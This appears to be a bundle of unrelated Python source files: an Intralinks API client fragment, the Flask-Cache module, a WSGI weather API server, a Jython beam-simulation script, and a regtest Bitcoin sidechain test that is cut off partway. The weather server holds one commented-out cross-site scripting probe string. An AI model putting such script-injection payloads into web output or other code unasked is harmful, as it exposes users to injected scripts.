self.config.base_url + relative_url,
params=http_params,
cookies=http_cookies,
headers=http_headers,
stream=stream,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_get(response, self.config.base_url, relative_url, http_params, http_cookies, http_headers, stream)
self.last_response = response
return ApiResponse(response)
def create(self, relative_url, params=None, data=None, files=None, headers=None, authenticated=True, api_version=None): # NOSONAR
http_method, http_params, http_cookies, http_headers = self.get_http_elements('CREATE', params, headers, authenticated=authenticated, api_version=api_version)
response = http_method(
self.config.base_url + relative_url,
params=http_params,
data=data,
files=files,
cookies=http_cookies,
headers=http_headers,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_post(response, self.config.base_url, relative_url, http_params, data, http_cookies, http_headers)
self.last_response = response
return ApiResponse(response)
def update(self, relative_url, params=None, data=None, files=None, headers=None, authenticated=True, api_version=None): # NOSONAR
http_method, http_params, http_cookies, http_headers = self.get_http_elements('UPDATE', params, headers, authenticated=authenticated, api_version=api_version)
response = http_method(
self.config.base_url + relative_url,
params=http_params,
data=data,
files=files,
cookies=http_cookies,
headers=http_headers,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_post(response, self.config.base_url, relative_url, http_params, data, http_cookies, http_headers)
self.last_response = response
return ApiResponse(response)
def delete(self, relative_url, params=None, data=None, headers=None, api_version=None):
http_method, http_params, http_cookies, http_headers = self.get_http_elements('DELETE', params, headers, authenticated=True, api_version=api_version)
response = http_method(
self.config.base_url + relative_url,
params=http_params,
data=data,
cookies=http_cookies,
headers=http_headers,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_delete(response, self.config.base_url, relative_url, http_params, http_cookies, http_headers)
self.last_response = response
return ApiResponse(response)
class ApiResponse:
def __init__(self, response):
self.response = response
self._data = None
def data(self):
if self._data is not None:
return self._data
elif self.content_type() == 'application/json':
self._data = self.response.json()
elif self.content_type() == 'text/xml':
self._data = intralinks.utils.xml.from_xml(self.response.content)
elif self.content_type() == 'text/html':
self._data = {'error':self.response.text}
else:
self._data = self.response.text
return self._data
def dump(self, fp):
for chunk in self.response.iter_content(chunk_size=1024):
if chunk:
fp.write(chunk)
def status_code(self):
return self.response.status_code
def content_type(self):
return self.response.headers.get('Content-Type', '').split(';')[0]
def _get_error(self, d):
error = None
if 'errors' in d:
error = intralinks.utils.data.get_node_as_list(d, 'errors')[0]
elif 'error' in d:
error = intralinks.utils.data.get_node_as_list(d, 'error')[0]
elif 'fault' in d:
error = d['fault']
return error
def _raise_error(self):
d = self.data()
code = None
subcode = None
message = None
error = self._get_error(d)
if error:
if 'code' in error:
code = error['code']
if 'message' in error:
message = error['message']
elif 'description' in error:
message = error['description']
elif 'faultstring' in error:
message = error['faultstring']
if 'subCode' in error:
subcode = error['subCode']
elif 'subcode' in error:
subcode = error['subcode']
raise ApiException(code, subcode, message, self.response)
def check(self, expected_status_code, expected_content_type):
self.assert_status_code(expected_status_code)
self.assert_content_type(expected_content_type)
self.assert_no_errors()
def assert_status_code(self, expected_status_code):
if isinstance(expected_status_code, int):
expected_status_code = {expected_status_code}
if self.status_code() not in expected_status_code:
self._raise_error()
def assert_content_type(self, expected_content_type):
if isinstance(expected_content_type, str):
expected_content_type = {expected_content_type}
if self.content_type() not in expected_content_type:
raise Exception(
self.response.url,
self.response.status_code,
self.response.headers['Content-Type'],
self.response.text
)
def assert_no_errors(self, expected_code=None):
d = self.data()
if self._get_error(d):
self._raise_error()
if expected_code is not None and d['status']['code'] != expected_code:
raise Exception(
self.response.url,
self.response.status_code,
self.response.headers['Content-Type'],
self.response.text,
d
)
def assert_ok(self, expected_status_code, expected_content_type):
self.assert_status_code(expected_status_code)
self.assert_content_type(expected_content_type)
self.assert_no_errors()
class ApiException(Exception):
def __init__(self, code=None, subcode=None, message=None, request=None):
self.code = code
self.subcode = subcode
self.message = message
self.request = request
def is_user_unknown(self):
return self.subcode == '3-1'
def is_user_already_a_member(self):
return self.subcode == '5-1-1'
# '1-1-3-2', "User's current session is invalid.This may be due to session timeout or concurrent login "
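# An illustrative sketch of ApiResponse on its own, wrapping a plain requests
# call and validating it the same way the client methods above do.  The URL is
# an arbitrary public JSON endpoint, not part of the Intralinks API.
def _example_api_response():
    raw = requests.get('https://httpbin.org/json')
    resp = ApiResponse(raw)
    resp.check(expected_status_code=200, expected_content_type='application/json')
    return resp.data()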
|
# -*- coding: utf-8 -*-
"""
flask.ext.cache
~~~~~~~~~~~~~~~
Adds cache support to your application.
:copyright: (c) 2010 by <NAME>.
:license: BSD, see LICENSE for more details
"""
__version__ = '0.7.1'
__versionfull__ = __version__
import uuid
import hashlib
import inspect
import warnings
import exceptions
from types import NoneType
from functools import wraps
from werkzeug import import_string
from werkzeug.contrib.cache import BaseCache, NullCache
from flask import request, current_app
JINJA_CACHE_ATTR_NAME = '_template_fragment_cache'
def function_namespace(f):
"""
Attempts to return a unique namespace for the function
"""
if hasattr(f, 'im_func'):
return '%s.%s.%s' % (f.__module__, f.im_class.__name__, f.__name__)
else:
return '%s.%s' % (f.__module__, f.__name__)
#: Cache Object
################
class Cache(object):
"""
This class is used to control the cache objects.
"""
def __init__(self, app=None, with_jinja2_ext=True, config=None):
self.with_jinja2_ext = with_jinja2_ext
self.config = config
self.cache = None
if app is not None:
self.init_app(app)
else:
self.app = None
self._memoized = []
def init_app(self, app, config=None):
"This is used to initialize cache with your app object"
if config is not None:
self.config = config
elif self.config is None:
self.config = app.config
if not isinstance(self.config, (NoneType, dict)):
raise ValueError("`config` must be an instance of dict or NoneType")
self.config.setdefault('CACHE_DEFAULT_TIMEOUT', 300)
self.config.setdefault('CACHE_THRESHOLD', 500)
self.config.setdefault('CACHE_KEY_PREFIX', None)
self.config.setdefault('CACHE_MEMCACHED_SERVERS', None)
self.config.setdefault('CACHE_DIR', None)
self.config.setdefault('CACHE_OPTIONS', None)
self.config.setdefault('CACHE_ARGS', [])
self.config.setdefault('CACHE_TYPE', 'null')
if self.with_jinja2_ext:
setattr(app.jinja_env, JINJA_CACHE_ATTR_NAME, self)
from flask.ext.cache.jinja2ext import CacheExtension
app.jinja_env.add_extension(CacheExtension)
self.app = app
self._set_cache()
def _set_cache(self):
import_me = self.config['CACHE_TYPE']
if '.' not in import_me:
import_me = 'flask.ext.cache.backends.' + \
import_me
cache_obj = import_string(import_me)
cache_args = self.config['CACHE_ARGS'][:]
cache_options = dict(default_timeout= \
self.config['CACHE_DEFAULT_TIMEOUT'])
if self.config['CACHE_OPTIONS']:
cache_options.update(self.config['CACHE_OPTIONS'])
self.cache = cache_obj(self.app, self.config, cache_args, cache_options)
if not isinstance(self.cache, BaseCache):
raise TypeError("Cache object must subclass "
"werkzeug.contrib.cache.BaseCache")
def get(self, *args, **kwargs):
"Proxy function for internal cache object."
return self.cache.get(*args, **kwargs)
def set(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.set(*args, **kwargs)
def add(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.add(*args, **kwargs)
def delete(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.delete(*args, **kwargs)
def delete_many(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.delete_many(*args, **kwargs)
def cached(self, timeout=None, key_prefix='view/%s', unless=None):
"""
Decorator. Use this to cache a function. By default the cache key
is `view/request.path`. You are able to use this decorator with any
function by changing the `key_prefix`. If the token `%s` is located
within the `key_prefix` then it will replace that with `request.path`
Example::
# An example view function
@cache.cached(timeout=50)
def big_foo():
return big_bar_calc()
# An example misc function to cache.
@cache.cached(key_prefix='MyCachedList')
def get_list():
return [random.randrange(0, 1) for i in range(50000)]
my_list = get_list()
.. note::
You MUST have a request context to actually called any functions
that are cached.
.. versionadded:: 0.4
The returned decorated function now has three function attributes
assigned to it. These attributes are readable/writable.
**uncached**
The original undecorated function
**cache_timeout**
The cache timeout value for this function. For a custom value
to take effect, this must be set before the function is called.
**make_cache_key**
A function used in generating the cache_key used.
:param timeout: Default None. If set to an integer, will cache for that
amount of time. Unit of time is in seconds.
:param key_prefix: Default 'view/%(request.path)s'. Beginning key to
use for the cache key.
.. versionadded:: 0.3.4
Can optionally be a callable which takes no arguments
but returns a string that will be used as the cache_key.
:param unless: Default None. The caching facilities always run unless
this callable returns True, in which case caching
is bypassed entirely.
"""
def decorator(f):
@wraps(f)
def decorated_function(*args, **kwargs):
#: Bypass the cache entirely.
if callable(unless) and unless() is True:
return f(*args, **kwargs)
cache_key = decorated_function.make_cache_key(*args, **kwargs)
rv = self.cache.get(cache_key)
if rv is None:
rv = f(*args, **kwargs)
self.cache.set(cache_key, rv,
timeout=decorated_function.cache_timeout)
return rv
def make_cache_key(*args, **kwargs):
if callable(key_prefix):
cache_key = key_prefix()
elif '%s' in key_prefix:
cache_key = key_prefix % request.path
else:
cache_key = key_prefix
cache_key = cache_key.encode('utf-8')
return cache_key
decorated_function.uncached = f
decorated_function.cache_timeout = timeout
decorated_function.make_cache_key = make_cache_key
return decorated_function
return decorator
def _memvname(self, funcname):
return funcname + '_memver'
def memoize_make_version_hash(self):
return uuid.uuid4().bytes.encode('base64')[:6]
def memoize_make_cache_key(self, fname, make_name=None):
"""
Function used to create the cache_key for memoized functions.
"""
def make_cache_key(f, *args, **kwargs):
version_key = self._memvname(fname)
version_data = self.cache.get(version_key)
if version_data is None:
version_data = self.memoize_make_version_hash()
self.cache.set(version_key, version_data)
cache_key = hashlib.md5()
#: this should have to be after version_data, so that it
#: does not break the delete_memoized functionality.
if callable(make_name):
altfname = make_name(fname)
else:
altfname = fname
if callable(f):
args, kwargs = self.memoize_kwargs_to_args(f, *args, **kwargs)
try:
updated = "{0}{1}{2}".format(altfname, args, kwargs)
except AttributeError:
updated = "%s%s%s" % (altfname, args, kwargs)
cache_key.update(updated)
cache_key = cache_key.digest().encode('base64')[:16]
cache_key += version_data
return cache_key
return make_cache_key
def memoize_kwargs_to_args(self, f, *args, **kwargs):
#: Inspect the arguments to the function.
#: This normalizes keyword arguments into their positional order so that
#: memoization treats equivalent calls identically, e.g.
#: f(1, b=2) is equivalent to f(a=1, b=2)
#: (see the worked example at the end of this module).
new_args = []
arg_num = 0
m_args = inspect.getargspec(f)[0]
for i in range(len(m_args)):
if i == 0 and m_args[i] in ('self', 'cls'):
continue
if m_args[i] in kwargs:
new_args.append(kwargs[m_args[i]])
elif arg_num < len(args):
new_args.append(args[arg_num])
arg_num += 1
return tuple(new_args), {}
def memoize(self, timeout=None, make_name=None, unless=None):
"""
Use this to cache the result of a function, taking its arguments into
account in the cache key.
Information on
`Memoization <http://en.wikipedia.org/wiki/Memoization>`_.
Example::
@cache.memoize(timeout=50)
def big_foo(a, b):
return a + b + random.randrange(0, 1000)
.. code-block:: pycon
>>> big_foo(5, 2)
753
>>> big_foo(5, 3)
234
>>> big_foo(5, 2)
753
.. versionadded:: 0.4
The returned decorated function now has three function attributes
assigned to it.
**uncached**
The original undecorated function. Read-only.
**cache_timeout**
The cache timeout value for this function. For a custom value
to take effect, this must be set before the function is called.
readable and writable
**make_cache_key**
A function used in generating the cache_key used.
readable and writable
:param timeout: Default None. If set to an integer, will cache for that
amount of time. Unit of time is in seconds.
:param make_name: Default None. If set this is a function that accepts
a single argument, the function name, and returns a
new string to be used as the function name. If not set
then the function name is used.
:param unless: Default None. The caching facilities always run unless
this callable returns True, in which case caching
is bypassed entirely.
.. versionadded:: 0.5
params ``make_name``, ``unless``
"""
def memoize(f):
@wraps(f)
def decorated_function(*args, **kwargs):
#: bypass cache
if callable(unless) and unless() is True:
return f(*args, **kwargs)
cache_key = decorated_function.make_cache_key(f, *args, **kwargs)
rv = self.cache.get(cache_key)
if rv is None:
rv = f(*args, **kwargs)
self.cache.set(cache_key, rv,
timeout=decorated_function.cache_timeout)
return rv
fname = function_namespace(f)
decorated_function.uncached = f
decorated_function.cache_timeout = timeout
decorated_function.make_cache_key = self.memoize_make_cache_key(fname,
make_name)
decorated_function.delete_memoized = lambda: self.delete_memoized(f)
return decorated_function
return memoize
def delete_memoized(self, fname, *args, **kwargs):
"""
Deletes the specified function's caches, based on the given parameters.
If parameters are given, only the functions that were memoized with them
will be erased. Otherwise all the versions of the caches will be deleted.
Example::
@cache.memoize(50)
def random_func():
return random.randrange(1, 50)
@cache.memoize()
def param_func(a, b):
return a+b+random.randrange(1, 50)
.. code-block:: pycon
>>> random_func()
43
>>> random_func()
43
>>> cache.delete_memoized('random_func')
>>> random_func()
16
>>> param_func(1, 2)
32
>>> param_func(1, 2)
32
>>> param_func(2, 2)
47
>>> cache.delete_memoized('param_func', 1, 2)
>>> param_func(1, 2)
13
>>> param_func(2, 2)
47
:param fname: Name of the memoized function, or a reference to the function.
:param \*args: A list of positional parameters used with memoized function.
:param \**kwargs: A dict of named parameters used with memoized function.
.. note::
Flask-Cache uses inspect to order kwargs into positional args when
the function is memoized. If you pass a function reference into ``fname``
instead of the function name, Flask-Cache will be able to place
the args/kwargs in the proper order, and delete the positional cache.
However, if ``delete_memoized`` is just called with the name of the
function, be sure to pass in potential arguments in the same order
as defined in your function as args only, otherwise Flask-Cache
will not be able to compute the same cache key.
.. note::
Flask-Cache maintains an internal random version hash for the function.
Using delete_memoized will only swap out the version hash, causing
the memoize function to recompute results and put them into another key.
This leaves any computed caches for this memoized function within the
caching backend.
It is recommended to use a very high timeout with memoize if using
this function, so that when the version hash is swapped, the old cached
results would eventually be reclaimed by the caching backend.
"""
if callable(fname):
assert hasattr(fname, 'uncached')
f = fname.uncached
_fname = function_namespace(f)
else:
f = None
_fname = fname
#: print import_string(_fname)
raise exceptions.DeprecationWarning("Deleting messages by relative name is no longer"
" reliable, please switch to a function reference"
" or use the full function import name")
if not args and not kwargs:
version_key = self._memvname(_fname)
version_data = self.memoize_make_version_hash()
self.cache.set(version_key, version_data)
else:
cache_key = fname.make_cache_key(f, *args, **kwargs)
self.cache.delete(cache_key)
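# A tiny worked example of the keyword-argument normalization performed by
# Cache.memoize_kwargs_to_args above; no Flask app or cache backend is needed
# for this helper, and the function below is illustrative only.
def _example_kwargs_to_args():
    def add(a, b):
        return a + b
    c = Cache(with_jinja2_ext=False)
    print(c.memoize_kwargs_to_args(add, 1, b=2))    # -> ((1, 2), {})
    print(c.memoize_kwargs_to_args(add, a=1, b=2))  # -> ((1, 2), {})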
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import re
import json
from datetime import datetime
from sample_weather_api_caller import SampleWeatherAPICaller, CityNotFoundError
from real_weather_api_caller import RealWeatherAPICaller
from urllib.parse import parse_qs
import threading
fake = False
# data source of city weather
cw_source = RealWeatherAPICaller()
if fake:
print("Fake mode now, use SampleWeatherAPICaller as source")
cw_source = SampleWeatherAPICaller() # fake one
# handlers for errors
def city_not_found(environ, start_response):
status = '404 Not Found'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
# ret = [("%s: %s\n" % (key, value)).encode("utf-8")
# for key, value in environ.items()]
# return ret
return ["404 City not found".encode("utf-8")]
# intended use for data source error, currently should only be used when forced error
def internal_error(environ, start_response):
status = '500 Internal Server Error'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
return ["500 Internal Server Error".encode("utf-8")]
def general_value_error(environ, start_response):
status = '400 Bad Request'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
error_msg = environ["custom_error_message"]
return [error_msg.encode("utf-8")]
def not_found(environ, start_response):
start_response('404 Not Found', [('Content-Type', 'text/plain')])
# ret = [("%s: %s\n" % (key, value)).encode("utf-8")
# for key, value in environ.items()]
# return ret
return ['404 Page Not Found'.encode("utf-8")]
def favicon(environ, start_response):
status = '200 OK'
headers = [('Content-type', "data:image/png;")]
with open("favicon.ico", 'br') as file:
f = file.read()
start_response(status, headers)
return [f]
def city_weather_full_view(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'application/json; charset=utf-8')]
try:
data_source = cw_source
# parse query string
q_s = environ.get('QUERY_STRING')
if not q_s:
raise ValueError("Please provide parameter of city, start and end")
query = parse_qs(q_s, strict_parsing=True)
# normally will raise if there is no query string, but we handled it above
for k,v in query.items():
# only want 1 thing from query string
query[k] = v[0]
start = query.get("start")
end = query.get("end")
city_short_name = query.get("city")
if (start is None) or (end is None):
raise ValueError("Need both start and end date")
start = datetime.strptime(start, "%Y-%m-%dT%H:%M:%S")
end = datetime.strptime(end, "%Y-%m-%dT%H:%M:%S")
if start > end:
raise ValueError("Start time is after End time")
if (city_short_name is None):
raise ValueError("City shortname is not provided")
city_short_name = city_short_name.lower()
# get city weather data
data = data_source.get_db_records(city_short_name, start, end)
# output
start_response(status, headers)
return [json.dumps(data).encode("utf-8")]
# Custom errors
except CityNotFoundError:
return city_not_found(environ, start_response)
except ValueError as e:
environ["custom_error_message"] = repr(e)
return general_value_error(environ, start_response)
class APIApplication(object):
def __init__(self, application):
self.application = application
self.setup_routes()
def setup_routes(self):
# map route to a view
self.routes = [
# e.g. /weather
(r'^\/weather$', city_weather_full_view),
(r'^\/favicon.ico', favicon)
]
def __call__(self, environ, start_response):
# main logic for the API Application
# parse path, then fail/show object
# https://bugs.python.org/issue16679
# Can't deal with unicode directly, needs to be ISO-8859-1 -> Byte -> Unicode
path = environ.get('PATH_INFO')
npath = bytearray(path, 'iso-8859-1').decode('utf8')
handler = self.find_route(npath)
return handler(environ, start_response)
def find_route(self, path):
# no checking for conflicting routes currently
for (pattern, handler) in self.routes:
if re.compile(pattern, re.UNICODE).search(path):
return handler
return not_found
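# An illustrative extra WSGI view: a trivial health-check endpoint.  It is an
# assumption, not part of the original API; to expose it, a route such as
# (r'^\/health$', _example_health_view) would be appended to self.routes in
# setup_routes above.
def _example_health_view(environ, start_response):
    start_response('200 OK', [('Content-type', 'text/plain; charset=utf-8')])
    return ["ok".encode("utf-8")]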
def simple_app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
# won't execute in browser anyway, not really a JSON object, but whatever
# return ["<script>alert('hacked world')</script>\n".encode("utf-8")]
# for debugging
ret = [("%s: %s\n" % (key, value)).encode("utf-8")
for key, value in environ.items()]
return ret
def keep_retrieve_data():
print("Going to retrieve data from external source now")
cw_source.retrieve_data()
# Minor note: cannot use kwargs to set Timer to daemon, will raise unknown keyword error
# But Timer is a subclass of Thread ...
t = threading.Timer(630.0, keep_retrieve_data)
if fake:
print("Fake mode now, can repeat retrieve data in every 30 secs")
t = threading.Timer(30.0, keep_retrieve_data) # for fake one
t.daemon = True
t.start()
if __name__ == '__main__':
print("WARNING: Keep restarting server when fake is False can result in BAN of the API Key")
timerThread = threading.Thread(target=keep_retrieve_data)
timerThread.daemon = True
timerThread.start()
with make_server('', 8000, APIApplication(simple_app)) as httpd:
print("Serving on port 8000...")
httpd.serve_forever()
|
<reponame>luxiaohan/openxal-csns-luxh<filename>core/src/xal/sim/slg/Dscript.py
#!/usr/bin/env jython
import sys
from java.lang import *
from java.util import *
from java.io import *
from org.xml.sax import *
from gov.sns.xal.smf import *
from gov.sns.xal.smf.impl import *
from gov.sns.xal.smf.impl.qualify import *
from gov.sns.xal.smf.xdxf import *
from gov.sns.xal.smf.parser import *
from gov.sns.xal.smf.data import *
from gov.sns.xal.model import *
from gov.sns.xal.model.xml import *
from gov.sns.tools.beam import *
###################################################################################
false= (1<0)
true=(1>0)
latin="MEBT"
#latin="lanl_MEBT"
#probin="particle"
probin="envelope"
# lattice input locations
lat_file={
"MEBT":"xml/MEBT_lanl_lattice.xml",
"lanl_MEBT":"/home/klotz/workspace/xaldev/work/xml/ModelValidation.lat.mod.xal.xml"}
# probe input locations
prb_file={
"??":"workspace/xaldev/xal_xmls/sns_probes.xml",
"particle":"/home/klotz/workspace/xaldev/work/xml/ModelValidation.particle.probe.mod.xal.xml",
"envelope":"/home/klotz/workspace/xaldev/work/xml/ModelValidation.envelope.probe.mod.xal.xml"}
def showParticleProbe(traj):
iterState= traj.stateIterator()
count=0
print "PARTICLE PROBE RESULTS"
titles = " Position Energy x x' y y'"
titles+= "\n======================================================================="
print titles
while iterState.hasNext():
count += 1
if count%10==0:
print "\n",titles
state= iterState.next()
s= state.getPosition()
W= state.getKineticEnergy()
phasevect= state.phaseCoordinates()
x= phasevect.getx()
xp=phasevect.getxp()
y =phasevect.gety()
yp=phasevect.getyp()
#digits=8
#buffer = repr(s)[:digits]
#buffer+= " "+repr(W)[:digits]
#buffer+= " "+repr(x)[:digits]
#buffer+= " "+repr(xp)[:digits]
#buffer+= " "+repr(y)[:digits]
#buffer+= " "+repr(yp)[:digits]
float="%+010f"
scien="%+010.3e"
digits = float % s
buffer = digits
digits = scien % W
buffer += " "+digits
digits = float % x
buffer += " "+digits
digits = float % xp
buffer += " "+digits
digits = float % y
buffer += " "+digits
digits = float % yp
buffer += " "+digits
buffer += " "+state.getElementId()
print buffer
def showEnvelopeProbe(traj):
iterState= traj.stateIterator()
count=0
print "ENVELOPE PROBE RESULTS"
titles = " Position eps-x x x' eps-y y y'"
titles+= "\n===================================================================================="
print titles
while iterState.hasNext():
count += 1
if count%10==0:
print "\n",titles
state= iterState.next()
s= state.getPosition()
twiss= state.twissParameters()
x = twiss[0].getEnvelopeRadius()
xp= twiss[0].getEnvelopeSlope()
ex= twiss[0].getEmittance()
y = twiss[1].getEnvelopeRadius()
yp= twiss[1].getEnvelopeSlope()
ey= twiss[1].getEmittance()
float="%+010f"
scien="%+010.3e"
digits = float % s
buffer = digits
digits = scien % ex
buffer += " "+digits
digits = float % x
buffer += " "+digits
digits = float % xp
buffer += " "+digits
digits = scien % ey
buffer += " "+digits
digits = float % y
buffer += " "+digits
digits = float % yp
buffer += " "+digits
buffer += " "+state.getElementId()
print buffer
if __name__ == '__main__':
#load the lattice
try:
cin=lat_file[latin]
print "Using '",cin,"' as lattice input"
print "======================================================"
lattice = LatticeXmlParser.parse(cin,false)
#dump current state and content to output
buffer = "LATTICE - "+lattice.getType()
buffer += "\nID :"+lattice.getId()
buffer += "\nAuthor :"+lattice.getAuthor()
buffer += "\nDate :"+lattice.getDate()
buffer += "\nVersion :"+lattice.getVersion()
buffer += "\nComments :"+lattice.getComments()
buffer += "\nChildren :"+repr(lattice.getChildCount())
buffer += "\nLeaves :"+repr(lattice.getLeafCount())
buffer += "\nLength :"+repr(lattice.getLength())
buffer += "\n================================================"
print buffer
cout= PrintWriter(System.out, Boolean("true"))
#lattice.print(cout)
except ParsingException, pe:
print pe.getMessage()
sys.exit(-1)
except Exception, e:
print e.getMessage()
sys.exit(-1)
#load the probe
try:
cin=prb_file[probin]
print "Using '",cin,"' as probe input"
print "======================================================"
envProbe=ProbeXmlParser.parse(cin)
#dump some initial probe parameters
buffer = "PROBE - " +repr(envProbe.getComment())
buffer += "\nBeta :"+repr(envProbe.getBeta())
buffer += "\nGamma :"+repr(envProbe.getGamma())
buffer += "\nKinetic Energy :"+repr(envProbe.getKineticEnergy())
buffer += "\nPosition :"+repr(envProbe.getPosition())
buffer += "\nSpecies Charge :"+repr(envProbe.getSpeciesCharge())
buffer += "\nSpecies Rest Energy:"+repr(envProbe.getSpeciesRestEnergy())
buffer += "\n================================================"
print buffer
except ParsingException, pe:
print pe.getMessage()
sys.exit(-1)
except Exception, e:
print e.getMessage()
sys.exit(-1)
#propagate the probe
try:
lattice.propagate(envProbe)
envTraj= envProbe.getTrajectory()
envTraj.setDescription("validation trajectory")
except ModelException, me:
print me.getMessage()
sys.exit(-1)
except Exception, e:
print e.getMessage()
sys.exit(-1)
#show results
if probin == "particle":
showParticleProbe(envTraj)
if probin == "envelope":
showEnvelopeProbe(envTraj)
|
#!/usr/bin/env python2
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
import os
import random
import sys
import time
import subprocess
import shutil
from decimal import Decimal
if len(sys.argv) < 2:
print("path to bitcoind must be included as argument")
sys.exit(1)
bitcoin_bin_path = sys.argv[1]
sidechain_bin_path = os.path.normpath(os.path.dirname(os.path.realpath(__file__))+"/../../src")
if len(sys.argv) > 2:
sidechain_bin_path = sys.argv[2]
print(bitcoin_bin_path)
print(sidechain_bin_path)
# Sync mempool, make a block, sync blocks
def sync_all(sidechain, sidechain2, makeblock=True):
block = ""
timeout = 20
while len(sidechain.getrawmempool()) != len(sidechain2.getrawmempool()):
time.sleep(1)
timeout -= 1
if timeout == 0:
raise Exception("Peg-in has failed to propagate.")
if makeblock:
block = sidechain2.generate(1)
while sidechain.getblockcount() != sidechain2.getblockcount():
time.sleep(1)
timeout -= 1
if timeout == 0:
raise Exception("Blocks are not propagating.")
return block
fedpeg_key="<KEY>"
fedpeg_pubkey="512103dff4923d778550cc13ce0d887d737553b4b58f4e8e886507fc39f5e447b2186451ae"
def get_pseudorandom_str(str_length=10):
return ''.join(random.choice('0123456789ABCDEF') for i in range(str_length))
def get_temp_dir(nodename):
return "/tmp/%s_%s" % (nodename, get_pseudorandom_str())
bitcoin_datadir = get_temp_dir('bitcoin')
bitcoin_pass = get_pseudorandom_str()
sidechain_datadir = get_temp_dir('sidechain')
sidechain_pass = get_pseudorandom_str()
sidechain2_datadir = get_temp_dir('sidechain2')
sidechain2_pass = get_pseudorandom_str()
bitcoin2_datadir = get_temp_dir('bitcoin2')
bitcoin2_rpccookiefile = bitcoin2_datadir + '/regtest/.cookie'
bitcoin_port = 8000 + os.getpid()%999
sidechain_port = bitcoin_port + 1
sidechain2_port = bitcoin_port + 2
sidechain1_p2p_port = bitcoin_port + 3
sidechain2_p2p_port = bitcoin_port + 4
bitcoin2_port = bitcoin_port + 5
bitcoin2_p2p_port = bitcoin_port + 6
bitcoin_p2p_port = bitcoin_port + 7
bitcoin = None
bitcoin2 = None
sidechain = None
sidechain2 = None
os.makedirs(bitcoin_datadir)
os.makedirs(sidechain_datadir)
os.makedirs(sidechain2_datadir)
os.makedirs(bitcoin2_datadir)
def write_bitcoin_conf(datadir, rpcport, rpcpass=None, p2p_port=None, connect_port=None):
with open(os.path.join(datadir, "bitcoin.conf"), 'w') as f:
f.write("regtest=1\n")
if p2p_port:
f.write("port="+str(p2p_port)+"\n")
if rpcpass:
f.write("rpcuser=bitcoinrpc\n")
f.write("rpcpassword="+rpcpass+"\n")
f.write("rpcport="+str(rpcport)+"\n")
f.write("discover=0\n")
f.write("testnet=0\n")
f.write("txindex=1\n")
f.write("daemon=1\n")
# To make sure bitcoind gives back p2pkh no matter version
f.write("addresstype=legacy\n")
if connect_port:
f.write("connect=localhost:"+str(connect_port)+"\n")
f.write("listen=1\n")
else:
f.write("listen=0\n")
write_bitcoin_conf(bitcoin_datadir, bitcoin_port, bitcoin_pass, p2p_port=bitcoin_p2p_port, connect_port=bitcoin2_p2p_port)
write_bitcoin_conf(bitcoin2_datadir, bitcoin2_port, rpcpass=<PASSWORD>, p2p_port=bitcoin2_p2p_port, connect_port=bitcoin_p2p_port)
with open(os.path.join(sidechain_datadir, "ocean.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=sidechainrpc\n")
f.write("rpcpassword="+sidechain_pass+"\n")
f.write("rpcport="+str(sidechain_port)+"\n")
f.write("discover=0\n")
f.write("testnet=0\n")
f.write("txindex=1\n")
f.write("fedpegscript="+fedpeg_pubkey+"\n")
f.write("daemon=1\n")
f.write("mainchainrpchost=127.0.0.1\n")
f.write("mainchainrpcport="+str(bitcoin_port)+"\n")
f.write("mainchainrpcuser=bitcoinrpc\n")
f.write("mainchainrpcpassword="+bitcoin_pass+"\n")
f.write("validatepegin=1\n")
f.write("port="+str(sidechain1_p2p_port)+"\n")
f.write("connect=localhost:"+str(sidechain2_p2p_port)+"\n")
f.write("listen=1\n")
f.write("fallbackfee=0.0001\n")
f.write("initialfreecoins=2100000000000000\n")
with open(os.path.join(sidechain2_datadir, "ocean.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=sidechainrpc2\n")
f.write("rpcpassword="+sidechain2_pass+"\n")
f.write("rpcport="+str(sidechain2_port)+"\n")
f.write("discover=0\n")
f.write("testnet=0\n")
f.write("txindex=1\n")
f.write("fedpegscript="+fedpeg_pubkey+"\n")
f.write("daemon=1\n")
f.write("mainchainrpchost=127.0.0.1\n")
f.write("mainchainrpcport="+str(bitcoin2_port)+"\n")
f.write("mainchainrpccookiefile=%s\n" % bitcoin2_rpccookiefile)
f.write("validatepegin=1\n")
f.write("port="+str(sidechain2_p2p_port)+"\n")
f.write("connect=localhost:"+str(sidechain1_p2p_port)+"\n")
f.write("listen=1\n")
f.write("fallbackfee=0.0001\n")
f.write("initialfreecoins=2100000000000000\n")
def test_pegout(parent_chain_addr, sidechain):
pegout_txid = sidechain.sendtomainchain(parent_chain_addr, 1)
raw_pegout = sidechain.getrawtransaction(pegout_txid, True)
assert 'vout' in raw_pegout and len(raw_pegout['vout']) > 0
pegout_tested = False
for output in raw_pegout['vout']:
scriptPubKey = output['scriptPubKey']
if 'type' in scriptPubKey and scriptPubKey['type'] == 'nulldata':
assert ('pegout_hex' in scriptPubKey and 'pegout_asm' in scriptPubKey and 'pegout_type' in scriptPubKey and
'pegout_chain' in scriptPubKey and 'pegout_reqSigs' in scriptPubKey and 'pegout_addresses' in scriptPubKey)
assert scriptPubKey['pegout_chain'] == '<KEY>' #testnet3
assert scriptPubKey['pegout_reqSigs'] == 1
assert parent_chain_addr in scriptPubKey['pegout_addresses']
pegout_tested = True
break
assert pegout_tested
try:
# Default is 8, meaning 8+2 confirms for wallet acceptance normally
# this will require 10+2.
sidechain_args = " -peginconfirmationdepth=10 "
# Start daemons
print("Starting daemons at "+bitcoin_datadir+", "+bitcoin2_datadir+", "+sidechain_datadir+" and "+sidechain2_datadir)
bitcoindstart = bitcoin_bin_path+"/bitcoind -datadir="+bitcoin_datadir
subprocess.Popen(bitcoindstart.split(), stdout=subprocess.PIPE)
